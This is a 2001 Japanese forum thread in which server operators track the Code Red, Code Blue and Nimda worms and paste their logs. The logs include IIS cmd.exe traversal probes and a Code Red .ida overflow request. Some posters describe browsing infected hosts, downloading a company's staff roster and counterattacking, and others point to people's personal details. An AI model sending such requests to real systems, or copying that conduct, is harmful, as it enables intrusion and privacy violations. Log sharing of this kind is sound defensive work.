01.9.11 11:18:48 AM　Deny　Web Sharing　yahoobb224212***.bbtec.net
01.9.11 11:18:47 AM　Deny　Web Sharing　yahoobb224212***.bbtec.net
01.9.11 11:06:29 AM　Deny　Web Sharing　yahoobb224251***.bbtec.net
01.9.11 11:06:29 AM　Deny　Web Sharing　yahoobb224251***.bbtec.net
01.9.11 11:06:28 AM　Deny　Web Sharing　yahoobb224251***.bbtec.net
01.9.11 11:00:25 AM　Deny　Web Sharing　yahoobb224251***.bbtec.net
01.9.11 11:00:24 AM　Deny　Web Sharing　yahoobb224251***.bbtec.net
01.9.11 10:32:08 AM　Deny　Web Sharing　yahoobb224212***.bbtec.net
01.9.11 10:32:07 AM　Deny　Web Sharing　yahoobb224212***.bbtec.net

窓の杜9/10メールより

02:【今日のお気に入り】Code Redワーム検知ソフト「赤虫捕まえ虫」v1.00
Code Red系のワームが侵入を試みるとサウンドが鳴り解析結果を表示する
ttp://www.cypress.ne.jp/mary/

『コード・ブルー』のＨＴＴＰアクセスログが見たい。

「第2のCode Red」となる可能性も――UNIXワーム「X.C」に警告
http://www.zdnet.co.jp/news/0109/11/e_worm.html

まぁ、IISにホトホト呆れて果てているUNIX屋さんですから。
当然、問題ないのでしょうケど。

>>747
telnetポート開けてるホストなんてそんなに無いとおもうよ。
たぶん、第２のCode Redにはならないと思う。
最近のRedHatって、telnetポート初めから開いてたっけ？
私、xinetdごと閉じちゃったから、わかんないや。

何かマスコミやNetの尻馬に乗って「MSなんか使ってるからだよ。うちは
Linux+Apacheだから全然大丈夫」なんてホザいてパッチ当ててない自称
パワーユーザーとかがやられそうな気がする。

>>748
一旦社内に持ち込まれると危ないかもしれない。
Internetにさらしている奴は少ないけどFirewallの内側では
開けている鯖って結構多いんじゃないかな？

最近WebArenaで会社のホームページを作ってるんだけど
まだどこにもリンクされてないからアクセスログに載るのはCode Redのアタックだけ。
１日に100回以上来てる。おかげで毎日アクセスログを見る楽しみ（鬱
なんかこの手のワームが蔓延したらそれだけでネットワークの負荷が大きくなりすぎて
インターネットがパンクしちゃうんじゃないかな。

>>747 の記事だと対象OS は Solaris，SGI IRIX，OpenBSD のようで
Linux は入ってないみたいだけど、逆になんでこの４つなのかな。
これらの telnetd ってみんな同じ、または同じところから派生してる
ってことかな。派生元が同じなら、もっとほかの Unix も影響しそう
なもんだけど。

>>752
> なんでこの４つなのかな。
「なんでこの３つなのかな」のマチガイ（藁

Linuxのtelnetd（0.17以前）にも、バッファオーバーフローの
問題が見つかったとこなのにね。
それとは、関係ないのかな。
どういうしくみなんだろ。
時期バージョンでは、それもついてくるって事かな？
っていうか、テルネット切れ。SSHつかえ。

>>753
数より被害の大きさを狙えばSolarisは外せないんじゃないかな。
IRIXとOpenBSDは同じ穴があったってことでは？
FreeBSDも一寸前に穴を塞いでいたから塞ぐ前のは危ないの
かも知れない。

本来 Solaris狙いの worm で、他のはたまたま引っかかったって
ことね、なるほど。

しかしバッファオーバフローの穴っていつまで経ってもポコポコ
出てくるなぁ。C で書いてる限り不可避なのか…。

で、CodeBlue は今流行ってるの？
実際のアタック報告はないのかな。

>>757
まだ、俺も受けてないけど・・・・
確実に万円してるもよう
「Code Redと似た新型ワーム「Code Blue」が，中国とオーストラリアで感染を広げているようだ。」
http://www.zdnet.co.jp/news/0109/12/e_codeblue.html

ねーねー。
CodeRedに感染してるホストに、FTPでAnonymousログインして、
ちらちら見て回ったら、それは犯罪になるの？

759>>
Anonymousで”公開”しているFTPサーバーに入っても
　犯罪にはならないでしょう。
　Anonymous　＝　だれでもアクセスOKヨ！

>>760
レスさんきゅっ！
でも、なんか会社の社員名簿とか、あからさまに公開しちゃマズそうなもの
ばっかりだったよ？
韓国のとこだったけど。こあいから、すぐ閉じちった。
名簿はＤＬしちゃったけど・・（ﾜﾗ
CodeRedに感染すると、各サービスのアクセス制限とか全部はずされちゃうの？

今さら新たにCodeRed送ってくる奴がいたから、ブ
ラウザでhttp://***.***.***.***/っていうふうに
アクセスしようとして、アドレス打ちまちがえたら
(SOHO向け？)ルータの設定画面が出てきた。

なんで設定画面を外に晒してんだ？
ケーブル剌す穴間違えたとか？

>>743
うちにも「ポートを塞いでいるだけ」に見えるCodeRedが
来るようになった。うざいなぁ。

>>761
そんな事はない。
パッチも当てられない管理者は、必要の無いタスクを落とす事も出来ない
とゆーだけでしょう。

>>762
うちのルータにも外部から設定画面入れる機能がある．
もちろん，指定Sourceアドレス以外は蹴るようになってるんだが．

＞＞762
遠隔設定が出来るルータにパスワード設定し忘れているだけと思われ

http://info.nttls.co.jp/
ここのセミナー用端末らしきIPから大量に来るんですけどー。
やめてよね。NTTさん。

それにしてもぜんぜんおさまらんのだね・・
こんだけ時間も経って情報も広まってんのに

ageついでに
CRcleanのバイナリはないのかな

ウチは未だに一日平均260〜270レッド。
8月初頭のピーク時で500〜800レッドだった。

反省汁ってどんな汁？

ニュースを一つ見つけたので張っとく
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

えーん氏、　さんくす！！

アメリカに行ってきた。
テロで飛行機が飛ばなくなった。
なんとか帰国した。
おみやげはもちろん Mountain Dew CODE RED だだだだっ。

>>774
美味い？

赤蟲ワッショイと踊りながら攻撃をしかけたくなるような味です。

http://www.iga-younet.co.jp/yybbs/yybbs.cgi

台湾政府から来るんだけどー

>>777
まだ気付いてないみたいね

今、中国（？）からアタックがあったんでﾁﾗｯっとアタック先のPC覗いてみたら
そのパソコンのアクセスログにこんなのあった。

2001-09-18 08:51:29 61.123.*.* - 61.182.*.* 80 HEAD /Warning!-You-may-be-infected-with-CodeRed! - 404 CodeRedCapture/1.0
やるねぇODNの人(w
これはCGIでやったのかな？

このチョンうざい！
code red吐きまくり！
顔写真やTELまで載ってるよ
http://210.110.71.140/

さっきからこんなシグネチャのが来てるんですがCodeRedの変種？
いまんとこsrc-ipはuniqで5つぐらい。相手は全部IIS4す。

GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir H
TTP/1.0" 404 319 "-" "-"

>782
来てます来てます、韓国ばっかですけど。

せっかく /Scripts/root.exeでアクセスできる
CGIを用意して待ってたのに アクセスパターンが
変わってがっかりしました

うちにも22：30から毎分きてる
ただ，782さんより試行がずっと多い

782です。
乗っけたシグネチャは全部ではないので、皆さんの
トコに来てるのと同じとおもいます。
srcはuniqでもProbeは同じパターンなので新種のwarmっぽいですね

うちにも22:34にまさぐりに来てます。
なんかごそごそまさぐってて気持ち悪いんですけど…
新種のworm?

あぁ　CodeRed自体の変種の可能性もあるのか。。

kazumu.as.wakwak.ne.jp と 61.147.112.72
が >>782 と同じ感じに探ってたから、今反撃してんだけど
辞めた方が良いかな。

つか、kazumu.as.wakwak.ne.jp って何？

一部載せとくのも何なので一部伏字で。
ちょっと前に出ていたCode Blue Warmってのとは違うのでしょうかね

--
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:55 +0900] "GET /scripts/root.ex
e?/c+dir HTTP/1.0" 404 280 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:55 +0900] "GET /MSADC/root.exe?
/c+dir HTTP/1.0" 404 278 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /c/winnt/system3
2/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /d/winnt/system3
2/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /scripts/..%255c
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /_vti_bin/..%255
c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:57 +0900] "GET /_mem_bin/..%255
c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:57 +0900] "GET /msadc/..%255c..
/..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+di
r HTTP/1.0" 404 335 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:58 +0900] "GET /scripts/..%c1%1
c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:58 +0900] "GET /scripts/..%c0%2
f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%c0%a
f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%c1%9
c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%%35%
63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:03 +0900] "GET /scripts/..%%35c
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:03 +0900] "GET /scripts/..%25%3
5%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:06 +0900] "GET /scripts/..%252f
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

もしかして [email protected] がメアドだったりするのかな。藁

はじめてきましたよ
これ

WWW - - [18/Sep/2001:22:53:20 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:21 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:24 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:25 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:26 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:26 +0900] "GET /sc?/c+dir HTTP/1.1" 404 218
WWW - - [18/Sep/2001:22:51:59 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 257

>782
うちにもいっぱい来てる！！
co.jpとne.jpが多いね。殆どがまだ、日本国内から。

すごいなー不正アクセスされぱなしだ
どうなってんの？

まじでやばそうよ！

ニュース版でほうこくしたら？

ちなみに動作内容はなんなの？

未だにCodeRedに感染する様な奴は二度とリブートさせんぜよ！
って感じの内容なら作成者褒めたげるんだけど。

うーん、テスト用にさらしてたPCがやられちゃった。
至る所にreadme.emlが出来てた。
テキストエディタで見てみたら、どうやら開くと何かのMovieが開くようだ。
見てみたい…

Code Blueだとすればコレかな
http://www.zdnet.co.jp/help/howto/security/v08/02.html
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

うちにも来てるんですけど噂のCode Blueなんですか？

61.151.230.** - - [18/Sep/2001:23:09:27 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 325
61.151.230.** - - [18/Sep/2001:23:09:28 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325
61.151.230.** - - [18/Sep/2001:23:09:32 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325

ほんとうだ新型がきだしたよ

今日は明らかに多いですね。これが噂のCode Blueか？

[Tue Sep 18 22:36:21 2001] [error] [client 61.77.94.***] File does not exist: scripts/root.exe

ずいぶん　来てます。

あーあ、また無意味なログ肥大化だよ、実害ないけどさ・・
パッチ適用していないアホドモはどうして減らないのだ？

>>802
激しく同意!!

http://kazumu.as.wakwak.ne.jp/
FW通して開いたら大爆笑

いっぺん死んでこい

来まくってるよ...もう32個所から。 *sigh*

まったく、やれやれって感じだ・・・

CodeRedに感染してる厨房は今度の新型にも感染してるような…

ま、apacheだからどうでもいいけどさっ!

203.***.***.*** からでした
やっとおさまったようです

Win厨管理者、、まじで逝ってよしだから。

いや、前回でこりたんじゃないの＞Win厨
勘弁してよ＞Win厨

NTとか2000とか使うかよ？ちょっとはPCに興味あるんだろ？
だったらM$製品なんて使うなボケ。カス。まじでウセロ。

未だ収束せず。
ログがお祭り状態っす (藁

おいコラ、NT屋！いいかげん何とかせい！

ひょっとして、凄まじい連続アタックなのですか？
どうなんでしょう？　非常に気分悪いです。
アパッチのログなんですが、１時間ほどで軽く１０００行越えますが。。。

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293

などなど続く…
てっきりわざとかと思ってたんですが、これってCode Blue？？

>809
すみません逝ってきます。
WIN2k+Apacheですけど、どんな穴があるかもや知れませんのでしばらくはサービス停止しておきます。

つーかM$、魔事務化（怒
不良品売りつけんな

黙らせると犯罪なの？

うちさ、インターリンクなんだけど、

前回のときもそうだったんだけど、セグメントごと
混み混みになっちゃうんだよね。
だから同じセグメントにNTがいたりすると遅くて遅くて。。

なんとかなんないの？？

インターリンクのサポートにログ晒せば？

気軽に亀レスしてしまったのですが、そろそろ
話題まとめる為にも誰か、新スレ立てていただけませんか？

>>815
おうよ。

それ前回やって苦情電話もした。
そのせいかどうか知らないけど、どうやらNTユーザを
強制切断したみたいだよ。

ところで…ていうか、なんかきてるよ、新種！うちはFreeBSDなんですが、２２：３０から、きまくってます！root.exeとか、探すんじゃネエ！って感じですが、いいかげんにしてほしい…今回はうちで鯖が本稼動してるんで、あした会社に行ってログみるのが鬱だ詩嚢…

うちはOCNなんだけど、ダイアルアップ臭い奴からもきてるのねん。
サポートにログ晒しても…OCNだし(ﾜﾗ

はぁ…

連続スマソ…
いい忘れてた、誰か新スレ立てて！

つーか2KのHDD消去してくれればいいのに・・・＞Code Blue

あ〜〜〜、新しい発言もなく、皆様と同じです、アパッチへ
無効root.exe　以下省略アタック。
午後10時半からです。すげぇいきおい。新スレッドキボン。
むちゃくるねぇ〜、CodeREDの影響なのかなぁ。Xデイだったのでしょうかね。
ida 一回のとはわけが違うのでウザイ。

あーーーーーー
遅ーーーーーーえーーーーーーーーーーー！
なんとかしてくれ＝＝＝＝＝＝＝＝＝
NTとめろ
２０００とめろ

この世はUNIXだけで成り立つべきだーーーーーー。

前に作ったCode Redのログ分離ツールは GET /def で
判断するだけで済んだけど、Code Blueの分離はなんか
めんどそうだなー

>>824
.exe?/c+dir HTTP/1.0 でどうよ？

ここでさらしてよかですか？

鬱だ…
見なかったことにして帰ろうっと♪

うちもすんげー来る、腹立つ
まわりに NT+IIS 使ってるところないからよくわからんけど
これって codered の穴ふさいであってもやられるの？

スレ立てたよ

うちもすんげー来る、腹立つ
まわりに NT+IIS 使ってるところないからよくわからんけど
これって codered の穴ふさいであってもやられるの？

>>824
あ　本当だ。ｔｈｘ

>828
やられました
はぁ　これじゃ厨房ですよ (c)TBS

まじで行数が多すぎる

塞いであってもパケットは容赦なくとんでくる

>>829
どもです。

ということで、続きはこちらで。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000824954

>>835
ごめんなさい。↑のは新スレではありません。


正しくは↓ですね

◆Code Blue◆ 2000厨は逝ってよし
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000825375

鬱だ。

Nimda 騒動でこのスレ下がったけど、
CodeRedまだ収まってないよ。。。。

ときどきNimdaログに混じってCodeRedログが発見される

NimdaとCodeRed両方のhttpアクセスとばしてきてるサイトがある。
注意してやろうかと思って、メールしようと思ったら、、
そこのドメインってDNSでmxレコードが設定されない。。。。。
ところで、試しにそこのマシンに25番ポートをつつくと
MSのSMTPが応答する。
1.外部メール交換したくないなら、自営ドメインを何故たてる？
2.なんで２５番をあけたままにする。？

こういう運用をしている人たちがいるから感染広がるだろうね。

[2001/09/24 3:51:54] CodeRed Type XXXXX from: 210.136.65.xx / g065018.ap.plala.or.jp
[2001/09/24 3:55:59] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:04] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:10] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:16] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:23] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:28] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:34] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:39] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:45] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:51] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:57] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:57:02] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:57:53] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:57:58] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:58:04] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:58:10] --unknown-- from: 202.132.46.xx /
[2001/09/24 4:22:22] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:24] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:24] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:25] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:25] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp

>840
なんとかって、言われても伏せ字　XX　じゃだめじゃないのか？

あっ、でもあとみえるね。やっちゃいましょうか？

テロの映像・写真を使って、ムービーを作ってみました。

http://isweb36.infoseek.co.jp/photo/sanorock/

このサイトはみなさんのインターネット環境の
スピードを計ってくれます。また、遅いと思う
人は設定を少し変えることによって無料で
スピードを早くすることができます。
お金を出す前に一度試してみては
いかがでしょうか。上がりの計測も可能です。

http://cym10262.omosiro.com/

>>840
それは、東邦大学
http://www.toho-u.ac.jp/index.html
職員採用のページへでも書いてやれ！

>>839
単にDNSにMXレコード書いてないだけでメールサーバは
普通に動いてるんなら届くんでないの?

なんかこっちの方が落ち着くなあ

今度IBMのノート買ってしまったYO

CodeRedだっておさまってねえ。
nimdaだってCodeRedと無関係ではない
で age とくよ

CodeRed おさまらないので age

うちにもよく来るのでsage

もうすぐ　９月と１０月の境目。。
ここでおさまるのか？

>>849
そういう説があるけど、信頼できる話なの？(^^;

From : [email protected]
Reply-To :
[email protected]


To : [email protected]
Subject : Got Debt? [ndywg]
Received: from [198.78.9.50] by hotmail.com (3.2) with ESMTP id MHotMail***;
Received: from kkgky.msn.com (212.216.22.67 [212.216.22.67]) by [email protected] with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)id S3MJ4TW0; Thu, 27 Sep 2001 21:47:48 -0400
From [email protected] Thu, 27 Sep 2001 18:37:39 -0700
−−−−−
mail.durdene.com (pri=1)
<<< 220 [email protected] ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
<<< 250 OK - mail from <"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection

問題あり：不正な中継を受け付けます。

(198.78.9.50)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

うちは確かに 10/1 04:00 (JST) 以降は "XXX" が来てない。
おさまった？

[01/Oct/2001:07:07:01 +0900] "GET /default.ida?XXXXX･･･

うちはこれが最後だな

終わったみたいだね。
しかし16倍うるさいのが来るようになっちゃってるからなあ。

8:44 にきて
しばらく来ないので収まったと思ったら
14:43にきて
17:26にもきた。

１０月１日云々というのが汚染マシンのローカルカレンダ見ての
振る舞いだったらカレンダ狂ってるマシンあれば
何日になってもくるのではないかいな。。

ハワイはもう10/1になっているかな？

211.242.80.33 - - [01/Oct/2001:14:43:12 +0900]
211.237.226.184 - - [01/Oct/2001:17:26:35 +0900]
211.225.158.6 - - [01/Oct/2001:23:22:43 +0900]
211.186.93.243 - - [02/Oct/2001:00:31:30 +0900]
211.222.226.249 - - [02/Oct/2001:00:45:51 +0900]
211.222.226.249 - - [02/Oct/2001:00:49:38 +0900]
211.96.111.55 - - [02/Oct/2001:01:49:07 +0900] "


１０月2日になってもまだあるな。。。

うちは
202.103.99.190 - - [01/Oct/2001:06:18:56 +0900]
が最後。

61.138.94.57 - - [01/Oct/2001:07:06:04 +0900]
うちはコイツだな。
見に行ったらNimdaにも感染してたよ。

あのさ、コードレッドの中身っぽい題名なしテキストメールが届いたんだけど、
なんかの仕業？新型ですか？

> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> >
〜中略〜
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> >
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > XXXXXXXXXX
> > > %`;vL36I

こんなの。

反応なしってことは、みんな知らないってことか。
誰かのイタズラか？

もしかして、NIMDA？

CodeRed2だよ

From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From [email protected] Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection
問題あり：不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

>>864 さん

CodeRed2はメール出すの？

>>866　ﾜﾗﾀ

>> 867

え？どう意味？
「おまえそんなことも知らないの？ﾜﾗﾀ」
って意味？？

だったら、恥ずかしい、モジモジ。

>>868
メールは出さないはず、確か。
で、861のメールの正体は分かったの？
漏れもよく分からないんだが。

「…こんなログが残ってるんですけど
　何？」っていうメールを書いている
途中に送信しちゃったとか？

>>869

ですよねー！！（ホッ。。
多分そんな感じだと思うんですけど、、（人為的なミス

取引先から言われて調べてるんですが、
ヘッダみたいからメール頂戴っていったら、
もう消しちゃったって。どうにもなんねッス。

なんかわかったら、報告入れます。

あちこちで反省汁ってたま〜に見るね。
地味に流行ってる？ｗ

最近、ノートンのログに1つか2つだけhttpが記録されてるけど、これはニムダ？
コードレッドの時は3回連続で記録されてたが…

>>871
反省汁は速報板で急激に流行たけど何か？

http://teri.2ch.net/korea/kako/994/994719628.html
>>849

反省しる！→つくる会教科書に抗議をするため国会で座り込みをした
　　　　　　　　韓国国会議員が掲げたプラカードに書かれた言葉。反省汁。
　　　　　　　　http://japan.donga.com/data/20010412/photo/2001041212148.jpg

なんか codered 全然来ないんすけど。ここ数日
因みに、ウチの最初のオクテットと同じ cn,kr,tw,hk をはじいてます。
ちょっとさびしい...

Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

http://ton.2ch.net/test/read.cgi/sec/1001864573/339

そろそろ、引越したいが、スレ立てすぎとかいわれたし鬱だ

今さらかよ！

[12/Oct/2001:15:20:17 +0900] "GET /default.ida?NNNNNNNNNN

何日ぶりだろう。おめでてーな。

「Code Red Re-Release?」
http://www.incidents.org/diary/october01/100901.php#4

おもしろくもないのでsage

>>878

ううう・・・。
213.179.221.137

ウチも久しぶりに今日一発来ました。
懐かしいね、おーよしよしって感じ。

http://www.nikkei.co.jp/news/seiji/20011015CIII043515.html

まぬけな福田官房長官は逝ってよし。

ウイルス関連のｶｷｺも、注意も減っている・・。

こんなときが危ないんだよ。コードレッドのあと、ニムダが発生する直前のようだ・・。

このひとからもらってください。
http://www.machibbs.com/touhoku/bbs/read.cgi?BBS=touhoku&KEY=1003494596
の２６

ちなみに八戸工業高校の教員らしいＹＯ

age age

そういえば亜種の話も聞かなくなったなあ･･･

がむばれﾊｶｰ

>>885
XP出るの待ってるんじゃないの？？
そいえば、マックOS-X版のIE5.1にバグ出たね。
MS01-053だって。。

保守

まもなくここは　乂1000取り合戦場乂　となります。

　 　 　 ＼∧＿ﾍ　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣
　,,､,､,,,　/ ＼〇ノゝ∩ ＜　1000取り合戦、いくぞｺﾞﾙｧ！！　　　　　　　,,､,､,,,
　　　　/三√ ﾟДﾟ)　/　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿　　,,､,､,,,
　　 　　/三/| ﾟＵﾟ|＼　　　　　　,,､,､,,,　　　　　　　　　　　　　　　　　　　　　　　,,､,､,,,
　,,､,､,,,　Ｕ （:::::::::::）　　,,､,､,,,　　　　　　　　　＼オーーーーーーーッ！！／
　　 　 　//三/|三|＼　　　　　∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　∪　 ∪　　　　　　 （　　　　）　　　 （　　　　 ）　　　（　　　　）　　　 ）
　,,､,､,,,　　　　　　　,,､,､,,,　　∧＿∧∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　,,､,､,,,　　　　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）

まだ、いました。
[09/Feb/2002:01:23:19 +0900] "GET /default.ida?NNNNNNNNN...NNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 214

全部Nタイプ
アドレスからみても初代っぽいけど
DoSするのかなあ？

202.29.*.* - - [07/Feb/2002:07:00:58 +0900] "GET /default.ida?NNNNNNNNNNNNNNN

